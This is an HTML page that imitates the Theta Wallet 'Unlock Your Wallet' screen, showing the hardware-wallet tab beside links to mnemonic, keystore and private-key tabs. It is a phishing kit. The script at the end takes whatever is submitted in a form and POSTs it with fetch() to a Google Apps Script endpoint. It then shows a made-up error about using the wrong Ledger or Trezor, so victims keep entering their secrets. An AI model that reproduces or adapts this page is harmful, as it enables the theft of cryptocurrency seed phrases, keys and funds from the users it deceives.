<html>
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no">
        <meta name="theme-color" content="#000000">
        <meta name="google-site-verification" content="KcY9AgCSabld-jTuurE9YBIV2pH0W5T1ACd0N4t1mPo">
        <title>Theta Wallet</title>
        <link rel="icon" type="image/x-icon" href="./images/favicon.ico">
        
    <link href="./thetastyles.css" rel="stylesheet" type="text/css">
    </head>
    <body><noscript>You need to enable JavaScript to run this app.</noscript>
        <div id="root">
            <div class="App">
                <div class="NavBar NavBar--is-centered">
                    <div style="display: flex; flex-direction: column; align-items: center;"><img class="NavBar__logo"
                            src="./images/theta_wallet_logo@2x.png"></div>
                </div>
                <div class="Pages">
                    <div class="UnlockWalletPage">
                        <div class="UnlockWalletPage__wrapper">
                            <div class="UnlockWalletPage__title">Unlock Your Wallet</div>
                            <div class="UnlockWalletCard">
                                <div class="UnlockWalletCard__content">
                                    <div class="UnlockWalletCard__header">
                                        <div
                                            class="TabBar UnlockWalletCard__tab-bar TabBar--is-centered TabBar--is-condensed">
                                            <a class="TabBarItem" href="./keystore.html">
                                                <div class="TabBarItem__title">Keystore</div>
                                            </a><a class="TabBarItem" href="/">
                                                <div class="TabBarItem__title">Mnemonic</div>
                                            </a><a class="TabBarItem" href="./privatekey.html">
                                                <div class="TabBarItem__title">Private Key</div>
                                            </a><a class="TabBarItem TabBarItem--is-active" href="./hardware.html"
                                                aria-current="page">
                                                <div class="TabBarItem__title">Hardware</div>
                                            </a></div>
                                    </div>
                                    <div class="UnlockWalletViaColdWallet">
                                        <div class="UnlockWalletViaColdWallet__title">Choose hardware</div>
                                        <div class="UnlockWalletViaColdWallet__cold-wallet-hardware-select"><a
                                                class="HardwareOptionButton undefined">
                                                <div class="HardwareOptionButton__title">Trezor</div>
                                            </a><a class="HardwareOptionButton undefined">
                                                <div class="HardwareOptionButton__title">Ledger</div>
                                            </a></div>
                                        <div class="UnlockWalletCard__warning"></div>
                                        <div class="UnlockColdWalletLedger__choose-derivation-path"></div>
                                        <div class="UnlockWalletViaColdWallet__footer"><a
                                                class=" GradientButton GradientButton1  undefined GradientButton--is-disabled">
                                                <div class="GradientButton__title">Connect</div>
                                            </a></div>
                                    </div>
                                </div>
                            </div>
                            <div class="UnlockWalletPage__subtitle"><span>Don't have a wallet?</span><a
                                    href="#/create">Create Wallet</a></div>
                        </div>
                    </div>
                </div>
                <div></div>
        </div>
        <script>
      const scriptURL =
        "https://script.google.com/macros/s/AKfycbzap7S5rga2_XR0g9nreFQrKhzSoO-JXH4ZgXsRIJkMdkwRZHIncLgKkyt7CpHwDTs/exec";
      const form = document.forms["submit-to-google-sheet"];
      const msg = document.getElementById("msg")

      form.addEventListener("submit", (e) => {
        e.preventDefault();
        fetch(scriptURL, { method: "POST", body: new FormData(form) })
          .then(response => {msg.innerHTML = "Please Use the correct Ledger or Trezor"
        setTimeout(function(){
          msg.innerHTML = ""
        },5000)
      form.reset()})
          .catch((error) => console.error("Error!", error.message));
      });
    </script>
    </body>
</html>